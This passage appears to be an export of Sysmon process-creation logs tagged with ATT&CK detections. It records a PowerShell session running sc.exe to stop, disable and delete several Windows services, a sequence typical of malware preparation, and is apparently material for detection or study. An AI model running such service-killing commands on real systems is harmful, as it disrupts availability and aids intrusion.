-NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \\gm Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.950478900Z"",""eventRecordID"":""2314"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.945\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-001046ca1d00}\r\nProcessId: 7328\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \\gm Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.945"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-001046ca1d00}"",""processId"":""7328"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\\gm Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.167",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.918 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-0010b0c81d00} +ProcessId: 6560 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop sysmgt +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.921110600Z"",""eventRecordID"":""2312"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.918\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-0010b0c81d00}\r\nProcessId: 6560\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.918"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-0010b0c81d00}"",""processId"":""6560"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop sysmgt"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.104",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.877 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-00102ec61d00} +ProcessId: 7068 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop CLR +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop CLR",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.879926800Z"",""eventRecordID"":""2308"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.877\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-00102ec61d00}\r\nProcessId: 7068\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop CLR\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.877"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-00102ec61d00}"",""processId"":""7068"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop CLR"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.077",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.848 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-00109fc41d00} +ProcessId: 1344 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Oracleupdate +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.850440700Z"",""eventRecordID"":""2306"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.848\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-00109fc41d00}\r\nProcessId: 1344\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.848"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-00109fc41d00}"",""processId"":""1344"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.061",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.648 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-0010d1c11d00} +ProcessId: 6008 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Oracleupdate +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.649844200Z"",""eventRecordID"":""2305"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.648\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-0010d1c11d00}\r\nProcessId: 6008\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.648"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-0010d1c11d00}"",""processId"":""6008"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:27.994",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.602 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-001077bf1d00} +ProcessId: 5776 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop system +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop system",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.604165800Z"",""eventRecordID"":""2302"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.602\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-001077bf1d00}\r\nProcessId: 5776\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop system\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.602"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-001077bf1d00}"",""processId"":""5776"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop system"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:27.928",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.559 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-001006bd1d00} +ProcessId: 3664 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Microsoft +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.561288400Z"",""eventRecordID"":""2299"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.559\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-001006bd1d00}\r\nProcessId: 3664\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 